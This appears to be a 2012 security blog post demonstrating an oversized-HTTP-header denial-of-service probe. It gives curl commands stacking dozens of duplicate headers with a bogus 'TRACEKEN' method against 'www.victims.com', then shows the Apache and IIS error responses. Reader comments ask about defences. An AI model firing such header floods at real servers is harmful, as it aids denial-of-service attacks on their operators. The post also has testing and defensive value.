Thursday, December 27, 2012

Hacking around with the http header sizes and request type TRACE

A question came up on a case where a DoS attempts were made against a webserver, &  using a heavily modify http header. So I figure I would demonstrate such attack using curl.

In this case, the  attacker had a valid requests, but he had a few bogus header fields. So I got creative and figure let me show you how I would conduct that attack. In this case, I wanted to flood a server with a few additional headers that would be more than the average number expected from a client's browser. It's easy to conduct this testing, via curl and the -H option

e.g

curl -v "Host: "  -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing" -H "Host: www.victims.com"    --request TRACEKEN www.victims.com 


Since in HTTP 1/1 we can have a  header of unlimited size, but it has to have a valid http.request. In the above, my request was a simple "TRACEKEN". Which was a  play on the http.request.method TRACE and my first name KEN :)

Here's what my server replied upon receipt of that request;

>
< HTTP/1.1 501 Method Not Implemented
< Date: Fri, 28 Dec 2012 00:09:19 GMT
< Server: Apache
< Allow: GET,HEAD,POST,OPTIONS,TRACE
< Content-Length: 220
< Cneonction: close
< Content-Type: text/html; charset=iso-8859-1
< Set-Cookie: NSC_qspmfyjd-209.200.154.11-80=ffffffffd2c09b0845525d5f4f58455e445a4a423660;expires=Fri, 28-Dec-2012 00:13:11 GMT;path=/;httponly
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>501 Method Not Implemented</title>
</head><body>
<h1>Method Not Implemented</h1>
<p>TRACEKEN to /index.html not supported.<br />
</p>
</body></html>
* Connection #0 to host www.victim.com left intact
* Closing connection #0


It was smart enough to recognize TRACEKEN was not valid, but  it also kicked out a error code of the 5XX series, and even gave me a list of valid request that it could take ( see the allow: and boldline)

Hmm interesting?

So if I've increase the header size to some god only knows what, the server will  have to look at all of the header information in order to process

curl -v "Host: "  -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing" -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "Host: " -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "User-Agent:  testing"  -H "Host: www.victims.com" --request TRACEK www.victims.com


And in this example, it generate a  error code of 5XX ( not good )

  HTTP/1.1 501 Method Not Implemented
< Date: Fri, 28 Dec 2012 00:23:46 GMT
< Server: Apache
< Allow: GET,HEAD,POST,OPTIONS,TRACE
< Content-Length: 218
< Cneonction: close
< Content-Type: text/html; charset=iso-8859-1
< Set-Cookie: NSC_qspmfyjd-209.200.154.11-80=ffffffffd2c09b0945525d5f4f58455e445a4a423660;expires=Fri, 28-Dec-2012 00:27:38 GMT;path=/;httponly


Now if I continued that line of approach & targeting,  and further exceed the limits within the http header. The server now gives me a 4XX code

< HTTP/1.1 400 Bad Request
< Date: Fri, 28 Dec 2012 00:24:49 GMT
< Server: Apache
< Content-Length: 290
< nnCoection: close
< Content-Type: text/html; charset=iso-8859-1
< Set-Cookie: NSC_qspmfyjd-209.200.154.11-80=ffffffffd2c09b0945525d5f4f58455e445a4a423660;expires=Fri, 28-Dec-2012 00:28:41 GMT;path=/;httponly
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
The number of request header fields exceeds this server's limit.</p>
</body></html>



btw:  I also tried that same http.request against my mail hosting outfit , and it gave me the same  error code of 4XX, but when the content was reduced, it just delivered a 301 redirection.

Here's example of the webserver response  ( microsoft), the same trace or traceken and a big header fields.

< HTTP/1.1 501 Not Implemented
< Content-Type: text/html
< Server: Microsoft-IIS/7.5
< Set-Cookie: .ASPXANONYMOUS=IFulQiUbzgEkAAAANmVmMzQxMjYtOWY0NS00NDI2LThjNmUtOTY1NDJmYzBlY2Fjxq6qN8WmCfVI5ORB_WjaZz3LHIU1; expires=Thu, 07-Mar-2013 11:16:48 GMT; path=/; HttpOnly
< Date: Fri, 28 Dec 2012 00:36:48 GMT
< Content-Length: 1508
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>501 - Header values specify a method that is not implemented.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>501 - Header values specify a method that is not implemented.</h2>
  <h3>The page you are looking for cannot be displayed because a header value in the request does not match certain configuration settings on the Web server. For example, a request header might specify a POST to a static file that cannot be posted to, or specify a Transfer-Encoding value that cannot make use of compression.</h3>
 </fieldset></div>
</div>



Happy hunting and the best of wishes for the DoS attacker and  DoS defenders.

Ken Felix
Freelance Security & Network Engineer
kfelix at hyperfeed dot com



4 comments:

  1. Hello , is there any method to fix this? I mean the 400 one.

    ReplyDelete
  2. I don't know what you mean by fix but to prevent this, a IPS rule or better yet a WAF would prevent oversize HTTP.headers or http.request lengths.

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. Is there any way where i can increase the header length? So that even if someone gives the long proxy greater then the size of 1024 it dosen't throw me the 400 error? Actually in my system i have a curl command which have a long proxy 'AAAAAAAAAAA' and so on. And if i am running the command with long proxy it gives me 400 error the same as above, but if i shorten the proxy and than run the command I am getting the required result. As I am trying to fix the HTTPONLY vulnerability in my system , so to cross check this our security team gave us the CURL command to cross check but with the original command they gave with the long proxy we are getting 400. I want to get the code likle 300 or 302 even with the long proxy(i;e the original command). Kindly suggest how can I do that?

    ReplyDelete